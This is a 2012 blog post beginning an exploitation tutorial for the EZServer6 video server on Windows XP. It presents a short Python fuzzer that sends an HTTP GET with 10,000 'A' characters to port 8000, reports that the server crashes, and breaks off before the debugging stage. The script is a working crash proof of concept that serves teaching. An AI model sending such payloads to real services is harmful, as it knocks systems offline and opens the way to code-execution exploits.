Wednesday, October 3, 2012

Software Exploitation : EZServer6

In this tutorial, we will try to exploit an application for video server, called ezserver, running on Windows XP. This application can be accessed with a web browser on port 8000. so, we will send a fuzzer that contains garbage data via GET method.









Fuzzer used are as follows:
#!/usr/bin/python

import socket
target="192.168.1.101"
target_port=8000
buff="GET /" + "\x41" * 10000 + "HTTP/1.0\r\n\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target,target_port))
sock.send(buff)
print "Sukses....!!"
sock.close()

 Let's fuzzing and see what happens...

 ez server crashes and disappears from the screen. Then we will see through OllyDbg.
To be Continue...^_^












Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)